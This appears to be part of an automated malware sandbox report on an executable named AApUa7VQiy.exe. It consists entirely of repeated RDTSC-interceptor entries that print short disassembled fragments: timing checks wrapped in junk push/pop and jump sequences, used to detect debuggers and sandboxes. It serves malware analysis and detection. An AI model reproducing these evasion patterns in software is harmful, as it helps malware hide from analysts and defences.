                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 109B410 second address: 109B42C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FF30CF3CAEFh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A4F16 second address: 10A4F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop eax 0x0000000f jnc 00007FF30D194DBCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A4F2D second address: 10A4F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007FF30CF3CAE6h 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A4304 second address: 10A4308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A46E5 second address: 10A46E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A46E9 second address: 10A46ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A46ED second address: 10A46F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A46F9 second address: 10A46FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A46FD second address: 10A4710 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF30CF3CAE6h 0x00000008 jnl 00007FF30CF3CAE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A4710 second address: 10A4747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF30D194DB6h 0x0000000a jmp 00007FF30D194DC9h 0x0000000f popad 0x00000010 jmp 00007FF30D194DBBh 0x00000015 popad 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A4747 second address: 10A474B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A474B second address: 10A474F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A4A6D second address: 10A4A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jl 00007FF30CF3CB04h 0x0000000b jmp 00007FF30CF3CAEDh 0x00000010 jmp 00007FF30CF3CAF1h 0x00000015 pop esi 0x00000016 push eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A4A9B second address: 10A4AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A4C56 second address: 10A4C72 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF30CF3CAE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007FF30CF3CAEEh 0x00000012 pop esi 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A4C72 second address: 10A4C8C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FF30D194DC1h 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A4DCF second address: 10A4DD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FF30CF3CAE6h 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A58B2 second address: 10A58C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF30D194DC0h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A58C6 second address: 10A58CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A5EF4 second address: 10A5EF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A6699 second address: 10A66AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF30CF3CAEDh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A66AE second address: 10A66BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A66BB second address: 10A66D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF30CF3CAF6h 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A67BC second address: 10A67DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF30D194DC1h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A68B0 second address: 10A68B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A68B4 second address: 10A68D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FF30D194DBCh 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f jno 00007FF30D194DBCh 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A6FB6 second address: 10A6FBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A6FBC second address: 10A6FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A6FC0 second address: 10A7062 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF30CF3CAEBh 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FF30CF3CAE8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 push 00000000h 0x0000002b mov esi, dword ptr [ebp+122D1991h] 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007FF30CF3CAE8h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 0000001Dh 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d call 00007FF30CF3CAEFh 0x00000052 je 00007FF30CF3CAE9h 0x00000058 movsx edi, si 0x0000005b pop edi 0x0000005c xchg eax, ebx 0x0000005d jmp 00007FF30CF3CAECh 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 push ebx 0x00000066 jmp 00007FF30CF3CAF1h 0x0000006b pop ebx 0x0000006c rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A786E second address: 10A7880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FF30D194DBCh 0x0000000b rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A8967 second address: 10A896C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10A9485 second address: 10A9489 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E38B1 second address: 10E38BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF30D194DB6h 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E38BB second address: 10E38BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E3A37 second address: 10E3A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E3A3D second address: 10E3A4D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF30CF3CAE6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E8474 second address: 10E848F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF30D194DC2h 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E848F second address: 10E84C8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF30CF3CAE6h 0x00000008 jno 00007FF30CF3CAE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 jnp 00007FF30CF3CAE6h 0x00000017 pop esi 0x00000018 push edi 0x00000019 jno 00007FF30CF3CAE6h 0x0000001f pop edi 0x00000020 popad 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FF30CF3CAF5h 0x00000029 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E84C8 second address: 10E84CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E877A second address: 10E879A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAEEh 0x00000007 jng 00007FF30CF3CAE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007FF30CF3CAE6h 0x00000017 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E94AE second address: 10E94BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF30D194DB6h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E94BD second address: 10E94C7 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF30CF3CAE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10E94C7 second address: 10E953A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FF30D194DC7h 0x0000000c jmp 00007FF30D194DC9h 0x00000011 pop ecx 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 jmp 00007FF30D194DC9h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d pushad 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FF30D194DC0h 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10F11B9 second address: 10F11BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10F11BF second address: 10F11C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10F11C4 second address: 10F11F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAF2h 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FF30CF3CAE6h 0x0000000f jmp 00007FF30CF3CAF4h 0x00000014 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10F11F4 second address: 10F11F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10F1627 second address: 10F162C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10F162C second address: 10F165E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF30D194DC2h 0x00000009 jmp 00007FF30D194DBDh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007FF30D194DB6h 0x00000017 jl 00007FF30D194DB6h 0x0000001d rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10F165E second address: 10F1662 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1060D06 second address: 1060D20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007FF30D194DB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF30D194DBAh 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1060D20 second address: 1060D34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FF30CF3CAE6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1060D34 second address: 1060D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10FDAA0 second address: 10FDABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF30CF3CAF4h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10FDABD second address: 10FDAD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF30D194DC2h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10FDAD3 second address: 10FDADC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10FDADC second address: 10FDAE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10FC565 second address: 10FC57B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007FF30CF3CAECh 0x0000000e pop edi 0x0000000f rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10FC6A4 second address: 10FC6B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10FC927 second address: 10FC95F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF30CF3CAE6h 0x0000000a jmp 00007FF30CF3CAF4h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF30CF3CAF6h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10FC95F second address: 10FC963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10FCAC3 second address: 10FCB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnp 00007FF30CF3CAE8h 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e jnp 00007FF30CF3CAE6h 0x00000014 pop ecx 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007FF30CF3CAF4h 0x0000001f push esi 0x00000020 pop esi 0x00000021 jmp 00007FF30CF3CAF0h 0x00000026 popad 0x00000027 pushad 0x00000028 push ecx 0x00000029 pop ecx 0x0000002a jmp 00007FF30CF3CAF8h 0x0000002f pushad 0x00000030 popad 0x00000031 pushad 0x00000032 popad 0x00000033 popad 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10FCB28 second address: 10FCB2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10ADCA5 second address: 10ADCA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10ADCA9 second address: 10ADCEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov di, si 0x0000000d push 00000004h 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007FF30D194DB8h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 mov ecx, 6459B5B3h 0x0000002e jns 00007FF30D194DBEh 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 push edx 0x0000003a pop edx 0x0000003b rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10ADCEF second address: 10ADCF5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10FCDFA second address: 10FCE04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF30D194DB6h 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10FCE04 second address: 10FCE1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 10FCE1F second address: 10FCE25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1102A41 second address: 1102A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1101C4D second address: 1101C82 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FF30D194DC9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF30D194DC4h 0x00000012 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1101C82 second address: 1101C88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1101C88 second address: 1101CA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DC6h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1101CA6 second address: 1101CAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1101CAA second address: 1101CD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FF30D194DBEh 0x00000010 ja 00007FF30D194DBEh 0x00000016 jo 00007FF30D194DB6h 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1101CD4 second address: 1101CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF30CF3CAE6h 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1101E29 second address: 1101E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11020F3 second address: 11020FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 11020FC second address: 1102102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1102102 second address: 1102106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 1102106 second address: 1102123 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jns 00007FF30D194DC2h 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 110228A second address: 1102297 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FF30CF3CAE6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeRDTSC instruction interceptor: First address: 110240B second address: 1102410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
